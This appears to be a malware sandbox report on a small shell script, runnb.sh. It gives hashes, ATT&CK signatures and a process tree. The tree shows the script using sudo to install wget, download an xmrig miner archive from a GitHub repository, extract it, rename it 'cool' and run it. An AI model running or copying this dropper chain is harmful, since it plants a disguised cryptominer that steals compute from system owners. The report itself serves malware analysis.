Analysis
-
max time kernel
48s -
max time network
50s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
30/10/2024, 13:11
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 766 chmod -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 706 sudo -
Reads CPU attributes 1 TTPs 2 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online exim4 -
description ioc Process File opened for reading /proc/filesystems mv File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems sudo File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/stat sudo File opened for reading /proc/self/fd sudo File opened for reading /proc/sys/kernel/ngroups_max sendmail -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fileutl.message.LnZFXF apt File opened for modification /tmp/fileutl.message.8LbZSq apt File opened for modification /tmp/fileutl.message.Q3iYUI apt File opened for modification /tmp/fileutl.message.eXG3n8 apt File opened for modification /tmp/fileutl.message.DhA2ig apt File opened for modification /tmp/fileutl.message.Ik8e1r apt File opened for modification /tmp/fileutl.message.7ZewYI apt File opened for modification /tmp/fileutl.message.aMQ4G4 apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:703
-
/usr/bin/sudosudo apt install wget2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:706 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:720 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t67YY-0000Bc-TS4⤵
- Reads CPU attributes
PID:734
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:723 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t67YY-0000Bf-SA4⤵
- Reads CPU attributes
PID:733
-
-
-
/usr/bin/aptapt install wget3⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:732
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:739
-
-
-
-
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:759
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:760
-
-
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:764
-
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:765
-
-
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:766
-
-
/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:767
-
-
/tmp/cool./cool2⤵PID:768
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
843B
MD5d374316c12d01a213d977ace8aefb99f
SHA10e280e7ec4bc03f7bddac65df4785535cc4f2e69
SHA2560ce8f1a190f91fb2b8d28a37ba24c7ba679db84d8d83f3cf95c158c8e48f397b
SHA51202abcb2f0774e5141e67e92fb356d96b29a5b947cfd9e937613fce75c7a973151bd1d4231a45b1b66fe089fb0aa7b477943836b7c5e3d15c3a73bbfd5aac1a7e
-
Filesize
1KB
MD593689982b9dcbfdbe8131bb5fcb49a9e
SHA10dc7522895cbf2bbf1a5fd02a64a901d1a5836db
SHA256b58f93d357915929c8df2d6133b16038c418219419242d768facca7650676d72
SHA5129017053243c38e2c16c419a467d18e2d1835f68ab9aa86347b62cefcf08edb274a8c5dc260bf53e541d0d3c4ed8f023213d5a22ba16d68a9578a958183e7ceee
-
Filesize
128B
MD55b4456a63fab269723b583310afd51ef
SHA10337d3c840f818744e913c861c9a66dede70bfac
SHA2563b2faafccae5cd1798ac5c705b4f3d1380f9465b430a710e2f0b79a0f185c645
SHA512a3790ca6b9bca038a038c3a54877cf468c02fcf9471d26a19b6298cd949af75f2e9163f77f782190b446dfd73dda010b67931cc0aca90654ad29d79748c8c4ca
-
Filesize
146B
MD51919bf4cd4bccf341d51c509a5c7ebe6
SHA191176ddc095f402d808c028c4aecd7c27c5df204
SHA2567c57d60b55f4f58b5c69169f46b027f69e578520ba3a3aee57c812d0664787cf
SHA5124ced20a83bf398c679fd3d8b026f6f29615ccf9a7dcc2f9360698b183872184643c83e6c408668f5eb489ef216c50dea511b7398eb80e78049477a15a04c9d1b
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
915B
MD5f516ada389b33a9066cc26856b92af86
SHA1d2d7ecdf754cbc6d3e6057085f834e610ad399b1
SHA25609d73ff8d26ef12b22f096c264f1c8af9fbba70f82acb647c7b04fb6594aba77
SHA512edff4cbefe00f91c193c521c2c52ad3ce8c9247d5f35b190763c50eecbf4ce1de0158d72e903c87a9820e319a4198d832df5d4a1fc65c00a78ae057ecf6e15f3
-
Filesize
288B
MD5839f294d8baf36fd0f7e105cbb86e207
SHA120c8e237549a848792804818c4a99b5ba62d7543
SHA25635b33356a4a8faa3e7f517301cc5947ec2bbb6c0473b7ab964b07892949c7776
SHA5120de3a44206482f92cf064dab9f3c8ed6ec4c3f2c46d6225453bf04e250d454d6fc06645dc7ffc996e8e0daabe5ded613bb246793032c5a340bbca8c33e18bee7
-
Filesize
89B
MD547b192cbf5345e029b4745b9bf307adc
SHA1abbaf31e0e9b13b5996c2c35b19d2a20f5862532
SHA256990cc6c25c5754e5e3171f603d580db758ddd9c3546e0f0b7eef69918990f4ed
SHA5124e1e2d38e294ec27eb8c2784ffd3a45bf4d04a872483dd3e382b54717a435c88a91b5c6c6d97e1d2ac5a3ee1209aaf2d24b9678f8668106df101162a9b64dfa3
-
Filesize
288B
MD57f013cb9d365c939aef52ca4782c9e4d
SHA1417bd479712caca7a19e22d5769a81fc2fc8bd1c
SHA256fe1e636dddc8915cbf21efa862e0df84b84b61f6d069b4898c249202fc32f54a
SHA5120ff468ae3f824b6ea6638c1bceeeb75a9339f59db37fb6b2ce326808e3ac99f75a1529e2807a35122c2de1cbcbb3ecd2fc1411c52c979524a2683f48d106e140
-
Filesize
89B
MD5a2dd77d1e0ed7340d745a8802e89f869
SHA1da07b1fafe5c53b3be089126bf27623191246ffa
SHA256e8b33e8c949d40c3351edb0a9b44f0eb92cf93071e1ed712872e5d9a97401972
SHA512dbc34f5e4fb99c9e13dc8a83e0de1a317b17574b3a014060cb7ed5a18f051cf544379e85b9a88b9509ec43b3713edc07258737145866bb25847eb1ea726e5988